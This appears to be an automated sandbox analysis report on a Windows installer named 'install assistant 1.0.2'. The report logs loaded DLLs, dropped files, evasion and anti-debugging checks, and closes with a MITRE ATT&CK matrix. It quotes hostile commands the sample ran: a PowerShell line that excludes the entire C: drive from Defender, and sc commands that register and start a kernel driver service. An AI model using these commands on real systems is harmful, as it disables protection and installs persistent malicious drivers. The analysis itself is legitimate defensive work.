Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Window found: window name: TMainForm
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exe | Static file information: File size 5986125 > 1048576
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.1804381617.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1804284846.0000000003870000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_007357D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount, 9_2_007357D0
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exe | Static PE information: real checksum: 0x0 should be: 0x5bdd3b
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp.0.dr | Static PE information: real checksum: 0x0 should be: 0x343a0e
Source: update.vac.1.dr | Static PE information: real checksum: 0x0 should be: 0x372ce7
Source: update.vac.6.dr | Static PE information: real checksum: 0x0 should be: 0x372ce7
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp.5.dr | Static PE information: real checksum: 0x0 should be: 0x343a0e
Source: hrsw.vbc.6.dr | Static PE information: real checksum: 0x0 should be: 0x372ce7
Source: tProtect.dll.12.dr | Static PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exe | Static PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp.0.dr | Static PE information: section name: .didata
Source: update.vac.1.dr | Static PE information: section name: .00cfg
Source: update.vac.1.dr | Static PE information: section name: .voltbl
Source: update.vac.1.dr | Static PE information: section name: .8Tk
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp.5.dr | Static PE information: section name: .didata
Source: 7zr.exe.6.dr | Static PE information: section name: .sxdata
Source: update.vac.6.dr | Static PE information: section name: .00cfg
Source: update.vac.6.dr | Static PE information: section name: .voltbl
Source: update.vac.6.dr | Static PE information: section name: .8Tk
Source: hrsw.vbc.6.dr | Static PE information: section name: .00cfg
Source: hrsw.vbc.6.dr | Static PE information: section name: .voltbl
Source: hrsw.vbc.6.dr | Static PE information: section name: .8Tk
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6C2286EB push ecx; ret 6_2_6C2286FE
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6C0D0F00 push ss; retn 0001h 6_2_6C0D0F0A
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6C2F6F10 push eax; ret 6_2_6C2F6F2E
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6C25B9F4 push 004AC35Ch; ret 6_2_6C25BA0E
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6C2F7290 push eax; ret 6_2_6C2F72BE
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_006B45F4 push 0075C35Ch; ret 9_2_006B460E
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_0074FB10 push eax; ret 9_2_0074FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_0074FE90 push eax; ret 9_2_0074FEBE
Source: update.vac.1.dr | Static PE information: section name: .8Tk entropy: 7.190790923053346
Source: update.vac.6.dr | Static PE information: section name: .8Tk entropy: 7.190790923053346
Source: hrsw.vbc.6.dr | Static PE information: section name: .8Tk entropy: 7.190790923053346
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | File created: C:\Users\user\AppData\Local\Temp\is-P3CLM.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | File created: C:\Users\user\AppData\Local\Temp\is-27JG6.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | File created: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | File created: C:\Users\user\AppData\Local\Temp\is-P3CLM.tmp\update.vac
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe | File created: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe | File created: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | File created: C:\Users\user\AppData\Local\Temp\is-27JG6.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe | File created: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | File created: C:\Program Files (x86)\Windows NT\7zr.exe
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | File created: C:\Users\user\AppData\Local\Temp\is-27JG6.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | File created: C:\Users\user\AppData\Local\Temp\is-P3CLM.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | File created: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp; System information queried: FirmwareTableInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 5976
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 3847
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp; Window / User API: threadDelayed 636
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp; Window / User API: threadDelayed 556
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp; Window / User API: threadDelayed 555
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-P3CLM.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-27JG6.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-P3CLM.tmp\update.vac
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-27JG6.tmp\_isetup\_setup64.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe; API coverage: 7.6 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3744; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\cmd.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\cmd.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp; Code function: 6_2_6C21AEC0 FindFirstFileA,FindClose,FindClose
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 9_2_006B6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 9_2_006B7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 9_2_006B9C60 GetSystemInfo
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000001.00000002.1776974855.000000000158C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp; Code function: 6_2_6C0A3886 NtSetInformationThread 00000000,00000011,00000000,00000000
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp; Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp; Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp; Code function: 6_2_6C230181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 9_2_007357D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp; Code function: 6_2_6C239D35 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp; Code function: 6_2_6C239D66 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp; Code function: 6_2_6C22F17D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp; Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp; Code function: 6_2_6C228CBD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp; Code function: 6_2_6C230181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: tProtect.dll.12.dr; Static PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp; Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe; Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp; Code function: 6_2_6C2F7720 cpuid
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 9_2_006BAB2A GetSystemTimeAsFileTime
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 9_2_00750090 GetVersion
Source: C:\Windows\System32\sc.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
MITRE ATT&CK Matrix (digits preceding a technique name are the signature-count badges from the original matrix):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 3 Windows Management Instrumentation | 1 Windows Service | 1 Access Token Manipulation | 11 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 Windows Service | 1 Disable or Modify Tools | LSASS Memory | 441 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Service Execution | Logon Script (Windows) | 111 Process Injection | 241 Virtualization/Sandbox Evasion | Security Account Manager | 241 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact
